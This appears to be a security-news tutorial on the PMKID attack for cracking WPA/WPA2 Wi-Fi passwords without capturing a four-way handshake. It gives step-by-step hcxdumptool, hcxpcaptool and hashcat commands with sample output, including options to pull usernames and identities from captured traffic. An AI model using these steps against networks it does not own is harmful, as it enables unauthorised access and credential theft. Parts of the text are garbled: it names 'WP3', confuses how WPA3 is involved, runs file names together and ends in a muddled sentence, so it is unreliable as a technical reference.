This method was discovered during the attack against the recently released WPA3 security standard, which is extremely difficult to crack since the modern key establishment protocol Simultaneous Authentication of Equals (SAE) was used. New WP3 security standard released by the Wi – Fi Alliance, which provides Wi – Fi security for the next generation with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard, which is a successor to WPA2. This attack is found by the researcher to compromise the WPA / WPA2 password without an EAPOL 4-way handshake. According to Steube, the developer of the Hashcat password cracking tool, the new attack is carried out on the RSN IE of a single EAPOL frame. This attack also works against all 802.11i / p / q / r roaming networks, and it is not clear how many vendors and routers this technique will work. How does this WPA / WPA2 WiFi Password Attack Works Robust Security Network Information Element (RSN IE) works in 802.11 management frames and in a single EAPOL framework. When the user attempts to authenticate with the router, the Pairwise Master Key ID (PMKID) can be captured from the RSN IE. ” We can see here that the PMKID is captured using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of the fixed string label ” PMK Name, ” the MAC address of the access point and the MAC address of the station.” To use this new attack, the following tools are required:
- hcxdumptool V4.2.0 or higher 2. hcxtools V4.2.0 or higher 3. Hashcat v4.2.0 or higher Step 1 First Run hcxdumptool to retrieve the AP PMKID and dump the PCAP file using the following code. $./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable status The output looks like this: Start capturing (stop with ctrl+c) INTERFACE:……………: wlp39s0f3u4u5 FILTERLIST……………: 0 entries MAC CLIENT……………: 89acf0e761f4 (client) MAC ACCESS POINT………: 4604ba734d4e (start NIC) EAPOL TIMEOUT…………: 20000 DEAUTHENTICATIONINTERVALL: 10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries REPLAYCOUNTER…………: 62083 ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69 Step 2 Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code. $./hcxpcaptool-z test.16800test.pcapng The file content will look like this and it will be divided into four columns. PMKID* MAC AP* MAC Station* ESSID 2582a8281bf9d4308d6f5731d0e61c614604ba734d4e89acf0e761f4 *ed487162465a774bfba60eb603a39f3a It is also recommended that options -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs) -I retrieve identities from WiFi-traffic -U retrieve usernames from WiFi-traffic $ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng Step 3 Finally, run hashcat to crack it, we must use the PMKID-16800 hash mode and we can use this hash as any other hash type. $ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’ Finally, it cracked the hash WPA-PMKID-PBKDF2 In order to gain access to the PMKID, this new attack simply has to try to authenticate the wireless network later. This method is also much easier to access the hash containing the pre-shared key and the hash will be cracked later, although this attack is not very complex due to the complexity of the password.